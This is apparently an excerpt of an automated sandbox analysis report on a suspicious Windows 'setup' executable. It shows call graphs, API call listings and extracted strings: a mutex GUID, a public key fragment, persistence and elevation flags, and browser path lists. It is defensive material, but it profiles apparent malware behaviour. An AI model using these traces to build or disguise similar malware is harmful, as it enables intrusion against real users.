420e53 __lock_file 59 API calls 44146->44148 44149 420d35 44148->44149 44150 42836b __flush 78 API calls 44149->44150 44152 420d41 44150->44152 44151 420d1e __initptd 44151->44081 44153 42818f __write 64 API calls 44152->44153 44154 420d8b 44153->44154 44271 420dab LeaveCriticalSection LeaveCriticalSection _fseek 44154->44271 44272 422310 44156->44272 44158 40c593 44158->44088 44160 42380e 44159->44160 44161 4237fe 44159->44161 44166 423824 44160->44166 44201 4230c5 44160->44201 44162 425208 __vsnwprintf_s_l 58 API calls 44161->44162 44165 423803 44162->44165 44164 42836b __flush 78 API calls 44167 423837 44164->44167 44172 4238fa LeaveCriticalSection LeaveCriticalSection _fseek 44165->44172 44166->44164 44168 42816b __fgetwc_nolock 58 API calls 44167->44168 44169 423865 44168->44169 44173 42818f 44169->44173 44171->44125 44172->44125 44174 42819b __initptd 44173->44174 44175 4281a8 44174->44175 44176 4281bf 44174->44176 44243 4251d4 58 API calls __getptd_noexit 44175->44243 44178 42825e 44176->44178 44180 4281d3 44176->44180 44247 4251d4 58 API calls __getptd_noexit 44178->44247 44179 4281ad 44182 425208 __vsnwprintf_s_l 58 API calls 44179->44182 44183 4281f1 44180->44183 44184 4281fb 44180->44184 44186 4281b4 __initptd 44182->44186 44244 4251d4 58 API calls __getptd_noexit 44183->44244 44188 43b134 ___lock_fhandle 59 API calls 44184->44188 44185 4281f6 44190 425208 __vsnwprintf_s_l 58 API calls 44185->44190 44186->44165 44189 428201 44188->44189 44191 428227 44189->44191 44192 428214 44189->44192 44193 42826a 44190->44193 44196 425208 __vsnwprintf_s_l 58 API calls 44191->44196 44230 42827e 44192->44230 44248 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44193->44248 44198 42822c 44196->44198 44197 428220 44246 428256 LeaveCriticalSection __unlock_fhandle 44197->44246 44245 4251d4 58 API calls __getptd_noexit 44198->44245 44202 4230d2 __write_nolock 44201->44202 44203 423102 44202->44203 44204 4230ea 44202->44204 44206 42816b __fgetwc_nolock 58 API calls 44203->44206 44205 425208 __vsnwprintf_s_l 58 API calls 44204->44205 44207 4230ef 44205->44207 44208 42310a 44206->44208 44266 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44207->44266 44210 42818f __write 64 API calls 44208->44210 44211 423126 44210->44211 44214 423316 44211->44214 44215 4231a9 44211->44215 44228 4230fa 44211->44228 44212 42a77e _LanguageEnumProc@4 6 API calls 44213 423451 44212->44213 44213->44166 44216 42331f 44214->44216 44221 4232d2 44214->44221 44218 4231cf 44215->44218 44215->44221 44217 425208 __vsnwprintf_s_l 58 API calls 44216->44217 44217->44228 44218->44228 44267 42f648 62 API calls 6 library calls 44218->44267 44220 423208 44223 423234 ReadFile 44220->44223 44220->44228 44222 42818f __write 64 API calls 44221->44222 44221->44228 44224 423383 44222->44224 44225 423259 44223->44225 44223->44228 44226 42818f __write 64 API calls 44224->44226 44224->44228 44227 42818f __write 64 API calls 44225->44227 44226->44228 44229 42326c 44227->44229 44228->44212 44229->44228 44249 43b3f1 44230->44249 44232 42828f 44233 4282a6 SetFilePointerEx 44232->44233 44234 428297 44232->44234 44236 4282d2 GetLastError 44233->44236 44237 4282be SetFilePointerEx 44233->44237 44235 425208 __vsnwprintf_s_l 58 API calls 44234->44235 44241 42829c 44235->44241 44262 4251e7 58 API calls 3 library calls 44236->44262 44237->44236 44238 4282e1 44237->44238 44240 4282e7 SetFilePointerEx 44238->44240 44238->44241 44242 425208 __vsnwprintf_s_l 58 API calls 44240->44242 44241->44197 44242->44241 44243->44179 44244->44185 44245->44197 44246->44186 44247->44185 44248->44186 44250 43b3fc 44249->44250 44252 43b411 44249->44252 44263 4251d4 58 API calls __getptd_noexit 44250->44263 44256 43b436 44252->44256 44264 4251d4 58 API calls __getptd_noexit 44252->44264 44253 43b401 44255 425208 __vsnwprintf_s_l 58 API calls 44253->44255 44258 43b409 44255->44258 44256->44232 44257 43b440 44259 425208 __vsnwprintf_s_l 58 API calls 44257->44259 44258->44232 44260 43b448 44259->44260 44265 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44260->44265 44262->44241 44263->44253 44264->44257 44265->44258 44266->44228 44267->44220 44268->44138 44269->44138 44270->44151 44271->44151 44273 42231c __initptd 44272->44273 44274 42235f 44273->44274 44275 422357 __initptd 44273->44275 44281 422332 _memset 44273->44281 44276 420e53 __lock_file 59 API calls 44274->44276 44275->44158 44278 422365 44276->44278 44277 425208 __vsnwprintf_s_l 58 API calls 44279 42234c 44277->44279 44285 422130 44278->44285 44299 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44279->44299 44281->44277 44288 42214b _memset 44285->44288 44292 422166 44285->44292 44286 422156 44287 425208 __vsnwprintf_s_l 58 API calls 44286->44287 44289 42215b 44287->44289 44288->44286 44288->44292 44296 4221a6 44288->44296 44321 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44289->44321 44300 422399 LeaveCriticalSection LeaveCriticalSection _fseek 44292->44300 44293 4222b7 _memset 44297 425208 __vsnwprintf_s_l 58 API calls 44293->44297 44294 42816b __fgetwc_nolock 58 API calls 44294->44296 44296->44292 44296->44293 44296->44294 44301 42b2f2 44296->44301 44322 429544 58 API calls 3 library calls 44296->44322 44323 42b5c4 44296->44323 44297->44289 44299->44275 44300->44275 44302 42b2fd 44301->44302 44306 42b312 44301->44306 44303 425208 __vsnwprintf_s_l 58 API calls 44302->44303 44304 42b302 44303->44304 44424 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44304->44424 44307 42b347 44306->44307 44314 42b30d 44306->44314 44425 438a16 58 API calls __malloc_crt 44306->44425 44309 42816b __fgetwc_nolock 58 API calls 44307->44309 44310 42b35b 44309->44310 44391 42b4b0 44310->44391 44312 42b362 44313 42816b __fgetwc_nolock 58 API calls 44312->44313 44312->44314 44315 42b385 44313->44315 44314->44296 44315->44314 44316 42816b __fgetwc_nolock 58 API calls 44315->44316 44317 42b391 44316->44317 44317->44314 44318 42816b __fgetwc_nolock 58 API calls 44317->44318 44319 42b39e 44318->44319 44320 42816b __fgetwc_nolock 58 API calls 44319->44320 44320->44314 44321->44292 44322->44296 44324 42b5e5 44323->44324 44325 42b5fc 44323->44325 44433 4251d4 58 API calls __getptd_noexit 44324->44433 44327 42bd34 44325->44327 44330 42b636 44325->44330 44444 4251d4 58 API calls __getptd_noexit 44327->44444 44329 42b5ea 44332 425208 __vsnwprintf_s_l 58 API calls 44329->44332 44333 42b63e 44330->44333 44339 42b655 44330->44339 44331 42bd39 44334 425208 __vsnwprintf_s_l 58 API calls 44331->44334 44371 42b5f1 44332->44371 44434 4251d4 58 API calls __getptd_noexit 44333->44434 44336 42b64a 44334->44336 44445 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44336->44445 44337 42b643 44341 425208 __vsnwprintf_s_l 58 API calls 44337->44341 44340 42b66a 44339->44340 44343 42b684 44339->44343 44344 42b6a2 44339->44344 44339->44371 44435 4251d4 58 API calls __getptd_noexit 44340->44435 44341->44336 44343->44340 44346 42b68f 44343->44346 44436 428cde 58 API calls 2 library calls 44344->44436 44348 4389c2 __write_nolock 58 API calls 44346->44348 44347 42b6b2 44349 42b6d5 44347->44349 44350 42b6ba 44347->44350 44351 42b7a3 44348->44351 44438 42f744 60 API calls 3 library calls 44349->44438 44352 425208 __vsnwprintf_s_l 58 API calls 44350->44352 44353 42b81c ReadFile 44351->44353 44358 42b7b9 GetConsoleMode 44351->44358 44355 42b6bf 44352->44355 44356 42b83e 44353->44356 44357 42bcfc GetLastError 44353->44357 44437 4251d4 58 API calls __getptd_noexit 44355->44437 44356->44357 44365 42b80e 44356->44365 44360 42b7fc 44357->44360 44361 42bd09 44357->44361 44362 42b819 44358->44362 44363 42b7cd 44358->44363 44374 42b802 44360->44374 44439 4251e7 58 API calls 3 library calls 44360->44439 44366 425208 __vsnwprintf_s_l 58 API calls 44361->44366 44362->44353 44363->44362 44364 42b7d3 ReadConsoleW 44363->44364 44364->44365 44367 42b7f6 GetLastError 44364->44367 44373 42bae0 44365->44373 44365->44374 44376 42b873 44365->44376 44369 42bd0e 44366->44369 44367->44360 44443 4251d4 58 API calls __getptd_noexit 44369->44443 44371->44296 44372 420bed _free 58 API calls 44372->44371 44373->44374 44379 42bbe6 ReadFile 44373->44379 44374->44371 44374->44372 44375 42b960 44375->44374 44381 42ba1d 44375->44381 44382 42ba0d 44375->44382 44385 42b9cd MultiByteToWideChar 44375->44385 44376->44375 44378 42b8df ReadFile 44376->44378 44380 42b900 GetLastError 44378->44380 44389 42b90a 44378->44389 44383 42bc09 GetLastError 44379->44383 44390 42bc17 44379->44390 44380->44389 44381->44385 44441 42f744 60 API calls 3 library calls 44381->44441 44384 425208 __vsnwprintf_s_l 58 API calls 44382->44384 44383->44390 44384->44374 44385->44367 44385->44374 44389->44376 44440 42f744 60 API calls 3 library calls 44389->44440 44390->44373 44442 42f744 60 API calls 3 library calls 44390->44442 44392 42b4bc __initptd 44391->44392 44393 42b4e0 44392->44393 44394 42b4c9 44392->44394 44396 42b5a4 44393->44396 44399 42b4f4 44393->44399 44426 4251d4 58 API calls __getptd_noexit 44394->44426 44431 4251d4 58 API calls __getptd_noexit 44396->44431 44398 42b4ce 44401 425208 __vsnwprintf_s_l 58 API calls 44398->44401 44402 42b512 44399->44402 44403 42b51f 44399->44403 44400 42b517 44408 425208 __vsnwprintf_s_l 58 API calls 44400->44408 44416 42b4d5 __initptd 44401->44416 44427 4251d4 58 API calls __getptd_noexit 44402->44427 44405 42b541 44403->44405 44406 42b52c 44403->44406 44407 43b134 ___lock_fhandle 59 API calls 44405->44407 44428 4251d4 58 API calls __getptd_noexit 44406->44428 44411 42b547 44407->44411 44412 42b539 44408->44412 44410 42b531 44413 425208 __vsnwprintf_s_l 58 API calls 44410->44413 44414 42b55a 44411->44414 44415 42b56d 44411->44415 44432 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44412->44432 44413->44412 44417 42b5c4 __read_nolock 70 API calls 44414->44417 44419 425208 __vsnwprintf_s_l 58 API calls 44415->44419 44416->44312 44420 42b566 44417->44420 44421 42b572 44419->44421 44430 42b59c LeaveCriticalSection __unlock_fhandle 44420->44430 44429 4251d4 58 API calls __getptd_noexit 44421->44429 44424->44314 44425->44307 44426->44398 44427->44400 44428->44410 44429->44420 44430->44416 44431->44400 44432->44416 44433->44329 44434->44337 44435->44337 44436->44347 44437->44371 44438->44346 44439->44374 44440->44389 44441->44385 44442->44390 44443->44374 44444->44331 44445->44371 44449 421ffe __initptd 44446->44449 44447 422010 44448 425208 __vsnwprintf_s_l 58 API calls 44447->44448 44450 422015 44448->44450 44449->44447 44451 42203d 44449->44451 44482 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44450->44482 44453 428df4 __getstream 61 API calls 44451->44453 44454 422042 44453->44454 44455 42204b 44454->44455 44456 422058 44454->44456 44457 425208 __vsnwprintf_s_l 58 API calls 44455->44457 44458 422081 44456->44458 44459 422061 44456->44459 44464 422020 __initptd @_EH4_CallFilterFunc@8 44457->44464 44465 42b078 44458->44465 44461 425208 __vsnwprintf_s_l 58 API calls 44459->44461 44461->44464 44464->44092 44473 42b095 44465->44473 44466 42b0a9 44467 425208 __vsnwprintf_s_l 58 API calls 44466->44467 44468 42b0ae 44467->44468 44487 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44468->44487 44470 42b2ac 44484 43fba6 44470->44484 44471 42208c 44483 4220ae LeaveCriticalSection LeaveCriticalSection _fseek 44471->44483 44473->44466 44481 42b250 44473->44481 44488 43fbc4 58 API calls __mbsnbcmp_l 44473->44488 44475 42b216 44475->44466 44489 43fcf3 65 API calls __mbsnbicmp_l 44475->44489 44477 42b249 44477->44481 44490 43fcf3 65 API calls __mbsnbicmp_l 44477->44490 44479 42b268 44479->44481 44491 43fcf3 65 API calls __mbsnbicmp_l 44479->44491 44481->44466 44481->44470 44482->44464 44483->44464 44492 43fa8f 44484->44492 44486 43fbbf 44486->44471 44487->44471 44488->44475 44489->44477 44490->44479 44491->44481 44495 43fa9b __initptd 44492->44495 44493 43fab1 44494 425208 __vsnwprintf_s_l 58 API calls 44493->44494 44496 43fab6 44494->44496 44495->44493 44497 43fae7 44495->44497 44510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44496->44510 44503 43fb58 44497->44503 44502 43fac0 __initptd 44502->44486 44512 427970 44503->44512 44506 43fb03 44511 43fb2c LeaveCriticalSection __unlock_fhandle 44506->44511 44507 43bac1 __wsopen_nolock 109 API calls 44508 43fb92 44507->44508 44509 420bed _free 58 API calls 44508->44509 44509->44506 44510->44502 44511->44502 44513 427993 44512->44513 44514 42797d 44512->44514 44513->44514 44516 42799a ___crtIsPackagedApp 44513->44516 44515 425208 __vsnwprintf_s_l 58 API calls 44514->44515 44517 427982 44515->44517 44519 4279a3 AreFileApisANSI 44516->44519 44520 4279b0 MultiByteToWideChar 44516->44520 44533 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44517->44533 44519->44520 44523 4279ad 44519->44523 44521 4279ca GetLastError 44520->44521 44522 4279db 44520->44522 44534 4251e7 58 API calls 3 library calls 44521->44534 44535 428cde 58 API calls 2 library calls 44522->44535 44523->44520 44526 4279e3 44527 4279ea MultiByteToWideChar 44526->44527 44529 42798c 44526->44529 44528 427a00 GetLastError 44527->44528 44527->44529 44536 4251e7 58 API calls 3 library calls 44528->44536 44529->44506 44529->44507 44531 427a0c 44532 420bed _free 58 API calls 44531->44532 44532->44529 44533->44529 44534->44529 44535->44526 44536->44531 44537->44097 44538->44104 44539->44097 44540->44053 44542 427e1a __initptd 44541->44542 44543 428af7 __lock 51 API calls 44542->44543 44544 427e21 44543->44544 44545 427eda _doexit 44544->44545 44546 427e4f DecodePointer 44544->44546 44561 427f28 44545->44561 44546->44545 44548 427e66 DecodePointer 44546->44548 44554 427e76 44548->44554 44550 427f37 __initptd 44550->42329 44552 427e83 EncodePointer 44552->44554 44553 427f1f 44555 427b0b _malloc 3 API calls 44553->44555 44554->44545 44554->44552 44556 427e93 DecodePointer EncodePointer 44554->44556 44558 427ea5 DecodePointer DecodePointer 44554->44558 44557 427f28 44555->44557 44556->44554 44560 427f35 44557->44560 44566 428c81 LeaveCriticalSection 44557->44566 44558->44554 44560->42329 44562 427f08 44561->44562 44563 427f2e 44561->44563 44562->44550 44565 428c81 LeaveCriticalSection 44562->44565 44567 428c81 LeaveCriticalSection 44563->44567 44565->44553 44566->44560 44567->44562 44568 481920 44569 42f7c0 __write_nolock 44568->44569 44570 481943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 44569->44570 44571 481a0b 44570->44571 44572 4819e2 GetProcAddress GetProcAddress 44570->44572 44573 481aab 44571->44573 44576 481a1b NetStatisticsGet 44571->44576 44572->44571 44574 481acb 44573->44574 44575 481ac4 FreeLibrary 44573->44575 44577 481ad5 GetProcAddress GetProcAddress GetProcAddress 44574->44577 44604 481b0d __write_nolock 44574->44604 44575->44574 44578 481a69 NetStatisticsGet 44576->44578 44579 481a33 __write_nolock 44576->44579 44577->44604 44578->44573 44580 481a87 __write_nolock 44578->44580 44582 45d550 101 API calls 44579->44582 44588 45d550 101 API calls 44580->44588 44581 481bee 44583 481c1b 44581->44583 44584 481c14 FreeLibrary 44581->44584 44587 481a5a 44582->44587 44585 481c31 LoadLibraryA 44583->44585 44586 481c24 44583->44586 44584->44583 44590 481c4a GetProcAddress GetProcAddress GetProcAddress 44585->44590 44591 481d4b 44585->44591 44668 4549a0 13 API calls 4 library calls 44586->44668 44587->44578 44588->44573 44601 481c84 __write_nolock 44590->44601 44607 481cac __write_nolock 44590->44607 44593 481d59 12 API calls 44591->44593 44594 48223f 44591->44594 44592 481c29 44592->44585 44592->44591 44595 481e5c 44593->44595 44596 482233 FreeLibrary 44593->44596 44656 482470 44594->44656 44595->44596 44618 481ed9 CreateToolhelp32Snapshot 44595->44618 44596->44594 44599 481d3f FreeLibrary 44599->44591 44600 48225b __write_nolock 44602 45d550 101 API calls 44600->44602 44603 45d550 101 API calls 44601->44603 44606 482276 GetCurrentProcessId 44602->44606 44603->44607 44604->44581 44609 45d550 101 API calls 44604->44609 44613 481b7c __write_nolock 44604->44613 44605 481d03 __write_nolock 44605->44599 44610 45d550 101 API calls 44605->44610 44608 48228f __write_nolock 44606->44608 44607->44605 44612 45d550 101 API calls 44607->44612 44614 45d550 101 API calls 44608->44614 44609->44613 44611 481d3c 44610->44611 44611->44599 44612->44605 44613->44581 44615 45d550 101 API calls 44613->44615 44616 4822aa 44614->44616 44615->44581 44617 42a77e _LanguageEnumProc@4 6 API calls 44616->44617 44619 4822ca 44617->44619 44618->44596 44620 481ef0 44618->44620 44621 481f03 GetTickCount 44620->44621 44622 481f15 Heap32ListFirst 44620->44622 44621->44622 44623 482081 44622->44623 44629 481f28 __write_nolock 44622->44629 44624 48209d Process32First 44623->44624 44625 482095 GetTickCount 44623->44625 44626 48210a 44624->44626 44634 4820b4 __write_nolock 44624->44634 44625->44624 44627 482118 GetTickCount 44626->44627 44628 482120 __write_nolock 44626->44628 44627->44628 44633 482196 44628->44633 44640 45d550 101 API calls 44628->44640 44648 482187 GetTickCount 44628->44648 44629->44623 44636 48204e Heap32ListNext 44629->44636 44637 482066 GetTickCount 44629->44637 44641 45d550 101 API calls 44629->44641 44647 481ff1 GetTickCount 44629->44647 44650 45d550 44629->44650 44631 481f56 Heap32First 44631->44629 44632 45d550 101 API calls 44632->44634 44635 4821a4 GetTickCount 44633->44635 44645 4821ac __write_nolock 44633->44645 44634->44626 44634->44632 44638 4820fb GetTickCount 44634->44638 44635->44645 44636->44623 44636->44629 44637->44623 44637->44629 44638->44626 44638->44634 44639 482219 44642 482229 44639->44642 44643 48222d CloseHandle 44639->44643 44640->44628 44644 481fd9 Heap32Next 44641->44644 44642->44596 44643->44596 44644->44629 44645->44639 44646 45d550 101 API calls 44645->44646 44649 48220a GetTickCount 44645->44649 44646->44645 44647->44629 44648->44628 44648->44633 44649->44639 44649->44645 44651 45d559 44650->44651 44653 45d57d __write_nolock 44650->44653 44669 46b5d0 101 API calls __except_handler4 44651->44669 44653->44631 44654 45d55f 44654->44653 44670 45a5e0 101 API calls __except_handler4 44654->44670 44657 48247a __write_nolock 44656->44657 44658 4824c3 GetTickCount 44657->44658 44659 482483 QueryPerformanceCounter 44657->44659 44660 4824d6 __write_nolock 44658->44660 44661 482499 __write_nolock 44659->44661 44662 482492 44659->44662 44663 45d550 101 API calls 44660->44663 44664 45d550 101 API calls 44661->44664 44662->44658 44665 4824ea 44663->44665 44666 4824b7 44664->44666 44667 482244 GlobalMemoryStatus 44665->44667 44666->44658 44666->44667 44667->44600 44668->44592 44669->44654 44670->44653
                APIs
                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                • GetLastError.KERNEL32 ref: 00419FD2
                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                • GetLastError.KERNEL32 ref: 00419FE4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005FA808,?), ref: 0041A0BB
                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu\/Cl5VAPHD7s0flHV9k4\\nKbqAfRUsAP\/a+Qe\/oq+LZX013wQniPG$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                • API String ID: 2957410896-2056406745
                • Opcode ID: 187d2a58a77475f6a9b9e367048fe825655b24abc28485fef5e8a8dbf835e774
                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                • Opcode Fuzzy Hash: 187d2a58a77475f6a9b9e367048fe825655b24abc28485fef5e8a8dbf835e774
                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 606 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 609 481a0b-481a0d 606->609 610 4819e2-481a05 GetProcAddress * 2 606->610 611 481aba-481ac2 609->611 612 481a13-481a15 609->612 610->609 613 481acb-481ad3 611->613 614 481ac4-481ac5 FreeLibrary 611->614 612->611 615 481a1b-481a31 NetStatisticsGet 612->615 616 481b0d 613->616 617 481ad5-481b0b GetProcAddress * 3 613->617 614->613 618 481a69-481a85 NetStatisticsGet 615->618 619 481a33-481a5d call 42f7c0 call 45d550 615->619 620 481b0f-481b17 616->620 617->620 618->611 621 481a87-481aae call 42f7c0 call 45d550 618->621 619->618 624 481c0a-481c12 620->624 625 481b1d-481b23 620->625 621->611 630 481c1b-481c22 624->630 631 481c14-481c15 FreeLibrary 624->631 625->624 628 481b29-481b2b 625->628 628->624 635 481b31-481b42 628->635 632 481c31-481c44 LoadLibraryA 630->632 633 481c24-481c2b call 4549a0 630->633 631->630 638 481c4a-481c82 GetProcAddress * 3 632->638 639 481d4b-481d53 632->639 633->632 633->639 646 481b45-481b47 635->646 644 481caf-481cb7 638->644 645 481c84 638->645 642 481d59-481e56 GetProcAddress * 12 639->642 643 48223f-482256 call 482470 GlobalMemoryStatus call 42f7c0 639->643 647 481e5c-481e63 642->647 648 482233-482239 FreeLibrary 642->648 669 48225b-4822cd call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 643->669 652 481cb9-481cc0 644->652 653 481d06-481d08 644->653 656 481c86-481cac call 42f7c0 call 45d550 645->656 650 481b98-481bb4 646->650 651 481b49-481b5d 646->651 647->648 654 481e69-481e70 647->654 648->643 650->624 667 481bb6-481bca 650->667 671 481b8a-481b8c 651->671 672 481b5f-481b84 call 42f7c0 call 45d550 651->672 659 481ccb-481ccd 652->659 660 481cc2-481cc9 652->660 657 481d0a-481d3c call 42f7c0 call 45d550 653->657 658 481d3f-481d45 FreeLibrary 653->658 654->648 663 481e76-481e7d 654->663 656->644 657->658 658->639 659->653 661 481ccf-481cde 659->661 660->653 660->659 661->653 680 481ce0-481d03 call 42f7c0 call 45d550 661->680 663->648 668 481e83-481e8a 663->668 688 481bfc-481bfe 667->688 689 481bcc-481bf6 call 42f7c0 call 45d550 667->689 668->648 675 481e90-481e97 668->675 671->650 672->671 675->648 682 481e9d-481ea4 675->682 680->653 682->648 690 481eaa-481eb1 682->690 688->624 689->688 690->648 696 481eb7-481ebe 690->696 696->648 702 481ec4-481ecb 696->702 702->648 706 481ed1-481ed3 702->706 706->648 710 481ed9-481eea CreateToolhelp32Snapshot 706->710 710->648 712 481ef0-481f01 710->712 713 481f03-481f0f GetTickCount 712->713 714 481f15-481f22 Heap32ListFirst 712->714 713->714 715 481f28-481f2d 714->715 716 482081-482093 714->716 717 481f33-481f9d call 42f7c0 call 45d550 Heap32First 715->717 718 48209d-4820b2 Process32First 716->718 719 482095-482097 GetTickCount 716->719 734 481f9f-481faa 717->734 735 482015-482060 Heap32ListNext 717->735 721 48210a-482116 718->721 722 4820b4-4820f5 call 42f7c0 call 45d550 718->722 719->718 723 482118-48211a GetTickCount 721->723 724 482120-482135 721->724 722->721 746 4820f7-4820f9 722->746 723->724 732 482196-4821a2 724->732 733 482137 724->733 737 4821ac-4821c1 732->737 738 4821a4-4821a6 GetTickCount 732->738 740 482140-482181 call 42f7c0 call 45d550 733->740 741 481fb0-481feb call 42f7c0 call 45d550 Heap32Next 734->741 735->716 742 482062-482064 735->742 753 482219-482227 737->753 754 4821c3-482204 call 42f7c0 call 45d550 737->754 738->737 740->732 771 482183-482185 740->771 763 481fed-481fef 741->763 764 48200f 741->764 747 482079-48207b 742->747 748 482066-482077 GetTickCount 742->748 746->722 752 4820fb-482108 GetTickCount 746->752 747->716 747->717 748->716 748->747 752->721 752->722 757 482229-48222b 753->757 758 48222d CloseHandle 753->758 754->753 774 482206-482208 754->774 757->648 758->648 768 481ff1-482002 GetTickCount 763->768 769 482004-48200d 763->769 764->735 768->764 768->769 769->741 769->764 771->740 772 482187-482194 GetTickCount 771->772 772->732 772->740 774->754 775 48220a-482217 GetTickCount 774->775 775->753 775->754
                APIs
                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                • FreeLibrary.KERNEL32(?), ref: 00481C15
                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                • FreeLibrary.KERNEL32(?), ref: 00481D45
                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                • GetTickCount.KERNEL32 ref: 00481F03
                • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                • Heap32Next.KERNEL32(?,?,?,?,?,4F99593C), ref: 00481FE3
                • GetTickCount.KERNEL32 ref: 00481FF1
                • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                • GetTickCount.KERNEL32 ref: 00482066
                • GetTickCount.KERNEL32 ref: 00482095
                • Process32First.KERNEL32(?,00000128), ref: 004820AA
                • GetTickCount.KERNEL32 ref: 004820FB
                • GetTickCount.KERNEL32 ref: 00482118
                • GetTickCount.KERNEL32 ref: 00482187
                • GetTickCount.KERNEL32 ref: 004821A4
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
